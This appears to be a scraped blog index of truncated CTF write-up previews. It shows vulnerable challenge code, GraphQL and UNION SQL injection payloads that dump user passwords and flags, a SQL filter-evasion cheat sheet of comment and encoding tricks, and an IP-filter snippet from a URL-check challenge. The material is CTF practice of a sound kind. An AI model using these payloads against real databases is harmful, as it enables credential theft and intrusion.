This post is protected.
While playing a CTF over the weekend, I found something really strange as I was solving a challenge.
    /* cakectf my-nyamber */
    async function queryNekoByName(neko_name, callback) {
        let filter = /(\'|\\|\s)/g;
        let result = [];
        if (typeof neko_name === 'string') {
            /* Process single query */
            if (filter.exec(neko_name) === null) {
                try {
                    let row = await querySqlStatement(
                        `SELECT * FROM neko WHERE name='${neko_name}'`
                    );
                    if (row) result.push(row);
                } catch { }
            }
        }
        ..

1. graphql injection
2. union sql injection
get admin password
    { allUsers{ username password } }
login - admin:is_this_visible_to_you?
    { Challs{ id title description category author points flag{ chall_flag } } }
Get Flag using sql injection
    { hint(chall_id:"-1/**/union/**/select/**/substr(group_concat(chall_flag),256,512),2,3/**/from/**/flags#"){ chall_id } }

Comments: #, --, /**/
Express string
    select 0x6162; -> ab
    select 0b110000101100010; -> ab
    select char(0x61, 0x62); -> ab
    select concat(char(0x61), char(0x62)); -> ab
    select mid(@@version,12,1); -> n /* Using Gadget... */
    select 'adm' 'in'; -> admin
    select 'ad''min'; -> ad'min
    select unhex(unhex(3631363236333634)); -> abcd
Useful Functions
1. string substring(), substr(), mid()
    # select mid('abcde', 2, ..

urlcheck1 - 98 points
    app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')

    def valid_ip(ip):
        matches = app.re_ip.match(ip)
        if matches == None:
            return False
        ip = list(map(int, matches.groups()))
        if any(i > 255 for i in ip) == True:
            return False
        # Stay out of my private!
        if ip[0] in [0, 10, 127] \
            or (ip[0] == 172 and (ip[1] > 15 or ip[1] < 32)) \
            or (ip[0] == 169 and ip[1] == 254) \
            or (ip[0]..

This post is protected.
This post is protected.